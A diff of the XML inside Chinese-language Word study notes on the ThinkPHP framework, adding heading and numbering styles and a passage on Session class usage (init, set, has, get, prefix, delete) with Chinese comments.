+              <w:tab/>
+              <w:t>return $view-&gt;fetch("users");//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>模板渲染输出</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>
@@ -1921,6 +7537,195 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
+  <w:abstractNum w:abstractNumId="0">
+    <w:nsid w:val="549A711E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="C4CEA52E"/>
+    <w:lvl w:ilvl="0" w:tplc="D9D8E0BA">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="（%1）"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="720"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1">
+    <w:nsid w:val="57D557E9"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="C396F068"/>
+    <w:lvl w:ilvl="0" w:tplc="7414BFEE">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="（%1）"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="720"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -2340,6 +8145,53 @@
       <w:szCs w:val="44"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="a"/>
+    <w:next w:val="a"/>
+    <w:link w:val="2Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="005038D2"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="4">
+    <w:name w:val="heading 4"/>
+    <w:basedOn w:val="a"/>
+    <w:next w:val="a"/>
+    <w:link w:val="4Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00B36F58"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="280" w:after="290" w:line="376" w:lineRule="auto"/>
+      <w:outlineLvl w:val="3"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="28"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -2413,6 +8265,71 @@
         <w:right w:w="108" w:type="dxa"/>
       </w:tblCellMar>
     </w:tblPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
+    <w:name w:val="标题 4 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="4"/>
+    <w:uiPriority w:val="9"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00B36F58"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="28"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="a5">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="a0"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00582DB2"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
+    <w:name w:val="标题 2 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="2"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="005038D2"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a6">
+    <w:name w:val="Balloon Text"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="Char"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B34D67"/>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
+    <w:name w:val="批注框文本 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="a6"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00B34D67"/>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>

--- a/编程技能汇总/PHP/PHP进阶_框架.docx
+++ b/编程技能汇总/PHP/PHP进阶_框架.docx
@@ -1761,6 +1761,29 @@
       </w:r>
       <w:r>
         <w:t>框架</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>杂项</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3637,13 +3660,951 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>ession</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>类：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:t>session</w:t>
+            </w:r>
+            <w:r>
+              <w:t>初始化或配置文件设置</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Session::init([</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'prefix'         =&gt; 'module',</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>不同</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>module session</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>不同</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'type'           =&gt; '',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'auto_start'     =&gt; true,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>是否自动启动</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="150" w:firstLine="315"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）存取数据</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="145" w:left="304"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Session::set('name','thinkphp',</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'think'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>]</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>赋值</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>(think</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>作用域</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="145" w:left="304"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>判断</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>think</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>作用域下面是否赋值</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="145" w:left="304"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Session::has('name',</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'think'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>]</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>判断</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>think</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>作用域</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>下面是否赋值</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="145" w:left="304"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Session::get('name',</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'think'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>]</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>取值</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>think</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>作用域</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="145" w:left="304"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Session::prefix('think');</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>指定当前作用域</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="145" w:left="304"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Session::delete('name',</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'think'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>]</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>删除</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>think</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>作用域</w:t>
